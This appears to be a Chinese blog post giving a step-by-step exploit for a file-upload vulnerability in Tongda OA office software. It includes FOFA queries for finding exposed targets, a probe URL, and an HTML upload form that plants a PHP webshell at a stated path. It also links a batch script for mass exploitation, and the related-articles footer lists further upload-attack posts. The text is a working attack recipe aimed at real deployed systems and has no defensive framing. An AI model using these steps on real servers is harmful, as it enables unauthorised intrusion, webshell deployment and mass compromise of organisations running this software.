通达OA文件上传漏洞

0x01 fofa收集目标

title="网络智能办公管理系统"
app="通达OA"

0x02测试是否存在上传漏洞

访问[ip地址:端口]/general/vmeet/wbUpload.php
响应200,则可能存在漏洞

0x03通过脚本上传shell

脚本内容

<form enctype="multipart/form-data" action="ip+端口/general/vmeet/wbUpload.php?fileName=test.php+" method="post">

<input type="file" name="Filedata" size="50"><br>

<input type="submit" value="Upload">

</form>

以ma.jpg形式上传,上传后自动帮你重命名为test.php
上传成功后webshell路径为
ip+端口/general/vmeet/wbUpload/test.php

0x04编写批量脚本

链接
https://github.com/qiya7/daily-code/blob/master/fofa_tongdaOA.py

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • From:黑白之道
    一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 10,357评论 0 9
  • 文件上传限制绕过的原理以及方法总结
    0x00 概述 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。文件...
    孤君蓑笠翁阅读 7,730评论 0 1
  • 文件上传漏洞
    0x00 介绍 文件上传漏洞是Web漏洞类型中最常见的一种,也是最容易获得服务器权限的漏洞之一。当网站上传功能设计...
    Franchen阅读 5,569评论 0 7
  • 【白帽子】文件上传漏洞
    0x01 概述 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。在大...
    queena_阅读 1,677评论 0 0
  • 不寻常的1776
    问题一:财富是什么? 答:财富是金银财宝,钱或劳动得来的成果。 问题二:蒸汽机和财富论为什么毁灭了旧世界建立了新世...
    空谷幽兰_aeb9阅读 2,299评论 0 0